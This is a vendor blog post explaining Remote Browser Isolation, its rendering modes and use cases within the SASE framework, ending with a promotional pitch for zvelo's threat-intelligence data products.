From ransomware, to phishing, to malware, to cross-site scripting and more, web-borne threats are rampant. According to a recent Verizon report, web application attacks are involved in 26% of all breaches, making it the second most common attack pattern. As we continue to explore the critical role of data in powering the different pieces of the SASE framework, this post is focused on Remote Browser Isolation (RBI) for delivering the next layer of SASE security.
What is Remote Browser Isolation?
Remote Browser Isolation (RBI) delivers secure internet access that protects physical endpoints and networks against browser-based exploits by using sandboxing to isolate web browsing activity in a remote cloud-based container. Since the browsing activity takes place in a separate virtual environment, exploits and vulnerabilities are kept isolated so any potential attacks cannot penetrate nor move around within the enterprise network. Although Remote Browser Isolation can effectively stop malicious JavaScript from executing in the browser, its capability to prevent phishing attacks is limited unless it’s using threat intelligence to filter and block phishing URLs. Without the phishing intelligence required to block phishing sites, users would still have the ability to access a fake page and enter their credentials.
As more organizations adopt Zero-Trust protocols, Remote Browser Isolation is leveraged to determine which targeted websites can or cannot be trusted based on web categories, users, and group policies. And while the RBI could be configured to determine that all web browser activity should be isolated, there are several types of RBI rendering which can be applied depending on the level of security that is truly required.
Pixel Rendering. Pixel rendering is recommended for use in high-risk cases which may be necessary for targeted industries like finance, healthcare, or government; or for executives and administrators with access to sensitive data, assets, and enterprise network infrastructures. In this case, the webpage loads and executes any code in the virtual container and then sends a vector graphic representation of the webpage back to the user to prevent any direct interaction between the web content (pictures, fonts, JavaScripts, etc.) and the endpoint browser. The downside of this method is that it can result in latency which may degrade the user experience.
DOM-Based Rendering. Document Object Model (DOM) Based Rendering, is recommended for medium-risk cases and may be suited for those with limited access to key assets or sensitive data. In this case, the riskier elements of a webpage like JavaScript are executed virtually, sanitized, and rewritten to remove malicious code before getting sent back to a user’s local browser. Other elements that are typically considered to be low-risk, like fonts, can be rendered directly in the end user’s local browser. This causes fewer cases of latency than pixel rendering because only some of the elements are isolated.
Streaming Media. Streaming is generally good for low-risk streaming, and other sites where the user experience is important. In this case, safe DOM elements are rendered in the user’s local browser, and the streamed media is natively sent to the browser to avoid the latency issues experienced with pixel rendering.
Top Three Use Cases
The first, and most common use case for remote browser isolation is to eliminate web-based attacks by isolating endpoints and networks from malicious or phishing content. RBI solutions can be used to prevent a variety of browser-based attacks like drive-by downloads, malvertising, phishing, credential harvesting, redirect attacks, or cross-site scripting.
The second use case is to protect web and cloud applications from attacks. The explosion of cloud and web apps over the last few years has accelerated the need to isolate web and cloud apps from malicious content that may get streamed from unmanaged devices. RBIs can be used to hide front-end web code or publicly exposed APIs by rendering a web or cloud app in an isolated container. This Web Application Isolation technique only sends the safe rendering to the local browser which prevents attackers from exploring a page’s source code for vulnerabilities and unpatched issues to exploit.
The third use case for Remote Browser Isolation is to support other tools like a Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), or even the SASE platform of services by enforcing security policies that ensure secure access to cloud applications via unmanaged devices. In order for any of these solutions to be effective in preventing attacks, they have to have visibility into the traffic they are designed to monitor. And while an RBI isn’t the only method to monitor access from unmanaged devices, it is a more efficient approach than using a reverse proxy which lacks flexibility and simply isn’t designed to support the growing number of cloud apps and unmanaged devices in an enterprise network environment.
Maximize User Protection with Premium Threat Intelligence Data
Using premium data to power an RBI solution enables maximum flexibility for configuring policies for high risk or non-sanctioned categories, as well as delivering premium threat protection. Notably, to gain protection from phishing attacks, an RBI tool must leverage high quality phishing threat intelligence that enables it to filter and block active phishing threats. For the vendors that select a ‘maximum protection’ model, they should focus on threat detections, a highly granular taxonomy for content classifications, and having the very critical capability to block and filter full-path URLs. For those evaluating data vendors to power an RBI solution, these are the areas that zvelo recommends analyzing.
Threat Detection Speed. How quickly are new and emerging threats detected — hours, days, longer? While the average time to detect can be tricky to pinpoint, it can be evaluated by measuring one threat feed provider against another. It goes without saying, the fastest time to detect is key.
Accuracy. While the fastest time to detect may be a leading priority, it should not be considered independently of accuracy. A lack of accuracy, or high false positive rate can ultimately work against you.
Coverage. Your visibility into the threat landscape, and ability to protect users and endpoints, depends on having extensive coverage of the ActiveWeb and global clickstream traffic.
Curation vs Aggregation. Data curation itself is another fuzzy definition. There are threat feed providers claiming to curate threat feeds, but what they are really doing is aggregating a selection of feeds, as opposed to actually curating the data that comes from those feeds. Vendors that include human curation on top of the AI-based processes will tend to have maximum coverage with the lowest possible false positive rates.
Content Classification. A premium domain database will also have excellent coverage for all forms of objectionable and other content, providing the vendor with the opportunity to offer content-based filtering to supplement the phishing and malicious protection.
Real-Time Detection/Update Capability. What constitutes ‘real-time’ in terms of technology applications can vary from minutes to hours. It’s important to understand how each threat feed provider defines real-time detections, as well as real-time updates (the time between which a threat is detected and the time that threat propagates to deployments).
URL Level for Blocking. It’s important to have the ability to filter and block URLs at various levels depending on the implementation — domains, subdomains, IPs and full-path. In some cases, blocking at the domain and subdomain is perfectly fine. Other times, full-path URL blocking is necessary to protect against threats more deeply embedded in commonly whitelisted sites like google docs, Dropbox, etc.
How RBI Fits into the SASE Framework
Just as each of the other pieces of SASE have a unique focus, so does Remote Browser Isolation. RBI solutions are designed to protect the web browser experience. And while limited in its capabilities as a stand-alone solution, it does play an important supporting role when combined with a Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), or as an added security layer in the SASE framework.
How zvelo Fits with Remote Browser Isolation Solutions
zvelo is the #1 provider of premium cyber threat intelligence data, URL database, and web classification services to SASE vendors. zveloDB is the market’s premier Domain Database with the broadest coverage of phishing, malicious and objectionable content detections, lowest false positive rate, fastest time to update, and best lookup performance speed. Additionally, the zveloCTI threat data offers both phishing and malicious detection threat feeds to support the need for full-path threat protection you need to power your Remote Browser Isolation, making zvelo a data powerhouse for your DNS Filtering, Secure Web Gateway, CASB and other SASE functions, all available through a single integration.
